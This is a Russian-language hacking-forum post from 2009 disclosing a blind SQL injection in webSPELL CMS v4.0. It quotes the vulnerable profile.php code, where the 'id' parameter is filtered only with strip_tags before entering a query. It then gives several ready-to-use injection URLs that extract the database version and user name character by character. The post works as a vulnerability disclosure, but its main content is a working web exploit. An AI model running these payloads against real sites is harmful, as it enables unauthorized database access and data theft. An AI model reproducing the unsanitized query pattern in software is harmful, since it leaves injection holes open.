
13.11.2009, 04:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
webSPELL CMS v4.0 Blind SQL injection
Уязвимость затаилась в скрипте профиля (profile.php):
PHP код:
...
if($_GET['id']) {
$id = strip_tags($_GET['id']);
//profil: buddys
if($_GET['action'] == "buddys") {
eval ("\$title_profile = \"".gettemplate("title_profile")."\";");
echo $title_profile;
$buddys=safe_query("SELECT buddy FROM ".PREFIX."buddys WHERE userID='$id'");
...
Единственной попыткой защитить свое "детище" программисты сделали фильтрацию пережаваемого ГОТом значния с помощю функции strip_tags(), которая как известно удаляет HTML и PHP теги из строки.
Реализация:
Код:
http://localhost/1/index.php?site=profile&id=1'+and+substring(version(),1,1)=5+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),1,1)))=114+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),2,1)))=111+and+'1'='1
И так далее.
Для удачной эксплаьации magic_quotes_gpc должно быть в положении off
|
|
|